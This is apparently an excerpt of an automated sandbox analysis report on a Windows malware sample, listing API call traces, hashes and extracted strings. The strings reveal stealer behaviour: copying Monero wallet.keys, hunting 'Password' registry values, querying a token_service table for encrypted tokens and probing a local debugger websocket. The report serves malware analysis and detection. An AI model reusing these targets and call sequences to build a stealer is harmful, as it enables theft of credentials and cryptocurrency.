                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: db01822afd7a508f2b647d3d6c54d349e313af7b4e66f8abf02dac011edb721e
                                  • Instruction ID: 45759b3c77e56fc4039075f0dbef430829aee80e5119c1569a1867e02d9c074e
                                  • Opcode Fuzzy Hash: db01822afd7a508f2b647d3d6c54d349e313af7b4e66f8abf02dac011edb721e
                                  • Instruction Fuzzy Hash: 3D7166B6914218FBDB14EBA4DD99FEE7379AB88300F004599F605A61C1EB38DB84CF51
                                  APIs
                                    • Part of subcall function 007012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007012B4
                                    • Part of subcall function 007012A0: RtlAllocateHeap.NTDLL(00000000), ref: 007012BB
                                    • Part of subcall function 007012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007012D7
                                    • Part of subcall function 007012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007012F5
                                    • Part of subcall function 007012A0: RegCloseKey.ADVAPI32(?), ref: 007012FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070134F
                                  • lstrlen.KERNEL32(?), ref: 0070135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00701377
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00701465
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 007014EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: aaa88125bf39fe1d0748b9aec8a7eea2ddf6b708e0e6c2f33a624751820bcd28
                                  • Instruction ID: 1a1ccbf10c3ee812b8039df8a8ac3527b53f295ebcc19cb840a649a4dff76ed4
                                  • Opcode Fuzzy Hash: aaa88125bf39fe1d0748b9aec8a7eea2ddf6b708e0e6c2f33a624751820bcd28
                                  • Instruction Fuzzy Hash: 445142B1D55118EBCB24FB64EDA6EED737D9F54300F4045D8B20A620D2EE385BC8CAA5
                                  APIs
                                  • InternetOpenA.WININET(00720AF6,00000001,00000000,00000000,00000000), ref: 00709A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00709AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00709AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 27c3ac89cb1cd34dd1d81396c398721085628a365b3c0b2d59347d5a36f8165d
                                  • Instruction ID: 378ed34531e641294e1546a5097cec0a5054877f1b332761aa8898562d6d9e57
                                  • Opcode Fuzzy Hash: 27c3ac89cb1cd34dd1d81396c398721085628a365b3c0b2d59347d5a36f8165d
                                  • Instruction Fuzzy Hash: E6413AB5A54218EBCB14EF94DC99BDDB7B4BB48340F104199F145A61D1DBB8AEC0CBA0
                                  APIs
                                    • Part of subcall function 00707330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0070739A
                                    • Part of subcall function 00707330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
                                    • Part of subcall function 00707330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
                                    • Part of subcall function 00707330: GetProcessHeap.KERNEL32(00000000,?), ref: 007074B2
                                    • Part of subcall function 00707330: HeapFree.KERNEL32(00000000), ref: 007074B9
                                  • lstrcat.KERNEL32(00000000,0072192C), ref: 00707666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007076A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 007076BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007076EF
                                  • lstrcat.KERNEL32(00000000,00721934), ref: 00707700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00707733
                                  • lstrcat.KERNEL32(00000000,00721938), ref: 0070774D
                                  • task.LIBCPMTD ref: 0070775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 0a74b8ce1ccbd203feb93501a00741dd7204ec0b5a459975a86510008f3acca8
                                  • Instruction ID: dd1ca61db95a450bce35444121bd90ad3abfaae6dce3037d8e2f28a584656801
                                  • Opcode Fuzzy Hash: 0a74b8ce1ccbd203feb93501a00741dd7204ec0b5a459975a86510008f3acca8
                                  • Instruction Fuzzy Hash: D231A675D59108EBDB08DBE0DC99DFFB3B9AF48301B504209F112A72E0EA38A9C5DB51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011DE2D8,00000000,?,00720E14,00000000,?,00000000), ref: 007182C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007182C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007182E8
                                  • __aulldiv.LIBCMT ref: 00718302
                                  • __aulldiv.LIBCMT ref: 00718310
                                  • wsprintfA.USER32 ref: 0071833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 5b71ff332dd01bf4867c63fb4af469b3b49594039dbda87514beacc3d6874f29
                                  • Instruction ID: b24eca6b9b70931af190a925b460f284bbe75b369dd4276c0ba4bfc75c7461a0
                                  • Opcode Fuzzy Hash: 5b71ff332dd01bf4867c63fb4af469b3b49594039dbda87514beacc3d6874f29
                                  • Instruction Fuzzy Hash: DC2108B1E58218ABDB10DFD8DC49FAEB7B9FB44B10F104509F615BB2C0D77859408BA5
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                  • InternetOpenA.WININET(00720DFB,00000001,00000000,00000000,00000000), ref: 0070615F
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00706197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007061DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0070622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0070625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00706299
                                  • InternetCloseHandle.WININET(?), ref: 007062A3
                                  • InternetCloseHandle.WININET(00000000), ref: 007062B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: fa15cf4c899f21b0d07b539f37841c0a78dfc473ad0e6015077c00c5a7cb885e
                                  • Instruction ID: bda441b0f3a9276cc35ef22d31cf709f73957f261c26ec5b8678f9cb7ea79c7a
                                  • Opcode Fuzzy Hash: fa15cf4c899f21b0d07b539f37841c0a78dfc473ad0e6015077c00c5a7cb885e
                                  • Instruction Fuzzy Hash: 035181B1A45218EBDB20DF90DC59BEEB7B9BB44301F008299F605A71C0DB786AC5CF95
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0078024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0078035B
                                  • CatchIt.LIBVCRUNTIME ref: 007803AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 007804C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: a9fa67a1b00be433781930eb3d5d491710c041afc98407b198fa6a440a6150ea
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: 10B1C171880209DFCF69EFA4C8499AEB7B5FF05310F10815AE9196B212D378DA55CFD1
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0070739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00707411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0070746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007074B2
                                  • HeapFree.KERNEL32(00000000), ref: 007074B9
                                  • task.LIBCPMTD ref: 007075B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: e3875c5a242bcca61b9a9a7b30e8addcb1b337c781a8e5b3c5f68da39aa6b525
                                  • Instruction ID: 954ca36adcc5b47dcd2dfe58915748e1eb20aa6e981a9a0598762d9e701e55d4
                                  • Opcode Fuzzy Hash: e3875c5a242bcca61b9a9a7b30e8addcb1b337c781a8e5b3c5f68da39aa6b525
                                  • Instruction Fuzzy Hash: 80611CB5D1416CDBDB24DB50CC45BD9B7B8BF48304F0082E9E689A6181EBB46BC9CF91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • lstrlen.KERNEL32(00000000), ref: 0070BC6F
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0070BC9D
                                  • lstrlen.KERNEL32(00000000), ref: 0070BD75
                                  • lstrlen.KERNEL32(00000000), ref: 0070BD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 225f74e6b8f439f9b044e99c42e846dda3c9897b9b0d1a5e37d0e5762522ee13
                                  • Instruction ID: 7fe68a0e79132f557c3ef7fd8baad4c9b61b20bc2b47a08fe6a6f752b79a574e
                                  • Opcode Fuzzy Hash: 225f74e6b8f439f9b044e99c42e846dda3c9897b9b0d1a5e37d0e5762522ee13
                                  • Instruction Fuzzy Hash: 09B141B1A15108EBCB14FBA4DCAAEEE7379AF14310F404559F506621D1EF386B88CB72
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
